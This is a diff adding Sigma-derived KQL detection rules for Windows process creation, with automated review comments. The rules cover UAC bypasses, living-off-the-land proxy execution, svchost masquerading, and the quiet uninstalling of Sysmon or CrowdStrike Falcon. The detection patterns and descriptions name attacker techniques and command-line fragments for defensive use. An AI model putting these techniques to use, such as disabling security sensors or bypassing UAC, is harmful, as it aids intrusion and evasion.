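Review bot: In the NTFS Reparse Point hunk the second `or` branch checks `ProcessIntegrityLevel in~ ("High", "System")` while the first branch and every sibling UAC rule in this batch use `("High", "System", "S-1-16-16384", "S-1-16-12288")`. If the SID spellings are ever needed they are needed here too; if the table never emits them they are dead weight everywhere, but either way a reader has to wonder whether the difference is intentional. The converter should emit one canonical integrity-level list, e.g. `(ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))` in both branches.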
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql
new file mode 100644
index 00000000..9debdadf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Windows Media Player - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")) and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql b/KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql
new file mode 100644
index 00000000..2a2b169a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via ICMLuaUtil
+// Author: Florian Roth (Nextron Systems), Elastic (idea)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql b/KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql
new file mode 100644
index 00000000..14419adc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via Windows Firewall Snap-In Hijack
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_wsreset.kql b/KQL/rules/windows/process_creation/uac_bypass_wsreset.kql
new file mode 100644
index 00000000..c7cb0138
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_wsreset.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass WSReset
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql b/KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql
new file mode 100644
index 00000000..7b3939f6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql
@@ -0,0 +1,12 @@
+// Title: UEFI Persistence Via Wpbbin - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-18
+// Level: high
+// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
+// False Positives:
+// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
+
+DeviceProcessEvents
+| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql
new file mode 100644
index 00000000..4a68b3dd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon AddinUtil.EXE CommandLine Execution
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql b/KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
new file mode 100644
index 00000000..95871c9b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon Assistive Technology Applications Execution Via AtBroker.EXE
+// Author: Mateusz Wydra, oscd.community
+// Date: 2020-10-12
+// Level: medium
+// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate, non-default assistive technology applications execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql
new file mode 100644
index 00000000..802c5177
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Process Of AddinUtil.EXE
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql
new file mode 100644
index 00000000..6a4b8721
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Child Process Of Appvlp.EXE
+// Author: Sreeman
+// Date: 2020-03-13
+// Level: medium
+// Description: Detects uncommon child processes of Appvlp.EXE
+// Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
+// Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
+// or to mark a file as a system file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql
new file mode 100644
index 00000000..866673e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Process Of BgInfo.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql
new file mode 100644
index 00000000..7ea966da
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Process Of Defaultpack.EXE
+// Author: frack113
+// Date: 2022-12-31
+// Level: medium
+// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql
new file mode 100644
index 00000000..7a64a5d5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql
@@ -0,0 +1,14 @@
+// Title: Uncommon Child Process Of Setres.EXE
+// Author: @gott_cyber, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-11
+// Level: high
+// Description: Detects uncommon child process of Setres.EXE.
+// Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.
+// It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1202
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath contains "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe") and (not((FolderPath endswith "C:\\Windows\\System32\\choice.exe" or FolderPath endswith "C:\\Windows\\SysWOW64\\choice.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql
new file mode 100644
index 00000000..d3f06a71
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Child Process Spawned By Odbcconf.EXE
+// Author: Harjot Singh @cyb3rjy0t
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process
+// - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\odbcconf.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql
new file mode 100644
index 00000000..14855785
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Processes Of SndVol.exe
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: medium
+// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
new file mode 100644
index 00000000..539307b3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
@@ -0,0 +1,11 @@
+// Title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: medium
+// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
+// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql
new file mode 100644
index 00000000..9e3fa150
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon FileSystem Load Attempt By Format.com
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql b/KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql
new file mode 100644
index 00000000..70c2b25e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql
@@ -0,0 +1,14 @@
+// Title: Uncommon Link.EXE Parent Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: medium
+// Description: Detects an uncommon parent process of "LINK.EXE".
+// Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
+// Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
+// This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
+// By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not(((InitiatingProcessFolderPath contains "\\VC\\bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql b/KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql
new file mode 100644
index 00000000..63a78489
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon One Time Only Scheduled Task At 00:00
+// Author: pH-T (Nextron Systems)
+// Date: 2022-07-15
+// Level: high
+// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005
+// False Positives:
+// - Software installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql b/KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql
new file mode 100644
index 00000000..03cd851a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Sigverif.EXE Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\sigverif.exe" and (not((FolderPath in~ ("C:\\Windows\\System32\\WerFault.exe", "C:\\Windows\\SysWOW64\\WerFault.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql b/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql
new file mode 100644
index 00000000..6f0c33dd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Svchost Command Line Parameter
+// Author: Liran Ravich
+// Date: 2025-11-14
+// Level: high
+// Description: Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.
+// This could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1036.005, attack.t1055, attack.t1055.012
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\svchost.exe" and (not((ProcessCommandLine =~ "" or ProcessCommandLine matches regex "-k\\s\\w{1,64}(\\s?(-p|-s))?" or isnull(ProcessCommandLine)))) and (not(((ProcessCommandLine contains "svchost.exe" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (ProcessCommandLine =~ "svchost.exe" and InitiatingProcessFolderPath endswith "\\MRT.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql b/KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql
new file mode 100644
index 00000000..1813d0e3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql
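Review bot: The `matches regex` exclusion in the final `| where` of uncommon_svchost_command_line_parameter.kql is an unanchored search, so the trailing optional group `(\\s?(-p|-s))?` can never change the outcome: the filter drops any command line that contains `-k` followed by a whitespace character and a word of up to 64 characters, no matter what else follows, which mirrors the Sigma `re` modifier and is presumably intended but is worth a comment so a tuner does not assume the full `svchost.exe -k <group> [-p|-s]` shape is enforced. Doubled backslashes inside the double-quoted literal are correct KQL but hard to audit; a verbatim literal reads as the regex itself, `ProcessCommandLine matches regex @"-k\s\w{1,64}(\s?(-p|-s))?"`. Separately, every generated file in this diff ends with `\ No newline at end of file`; the converter that writes these rules should terminate each file with a newline, and that applies to all other hunks on this page as well.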
@@ -0,0 +1,10 @@
+// Title: Uncommon Svchost Parent Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-08-15
+// Level: medium
+// Description: Detects an uncommon svchost parent process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+
+DeviceProcessEvents
+| where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql
new file mode 100644
index 00000000..a0645f69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon System Information Discovery Via Wmic.EXE
+// Author: TropChaud
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
+// including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
+// and GPU driver products/versions.
+// Some of these commands were used by Aurora Stealer in late 2022/early 2023.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql b/KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql
new file mode 100644
index 00000000..94bb8041
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon Userinit Child Process
+// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton
+// Date: 2019-01-12
+// Level: high
+// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence
+// False Positives:
+// - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql b/KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql
new file mode 100644
index 00000000..c7808e5d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql
@@ -0,0 +1,12 @@
+// Title: Uninstall Crowdstrike Falcon Sensor
+// Author: frack113
+// Date: 2021-07-12
+// Level: high
+// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql b/KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql
new file mode 100644
index 00000000..3589c35f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql
@@ -0,0 +1,12 @@
+// Title: Uninstall Sysinternals Sysmon
+// Author: frack113
+// Date: 2022-01-12
+// Level: high
+// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administrators might use this command to remove Sysmon for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql b/KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql
new file mode 100644
index 00000000..d67baf90
--- /dev/null
+++ b/KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql
@@ -0,0 +1,12 @@
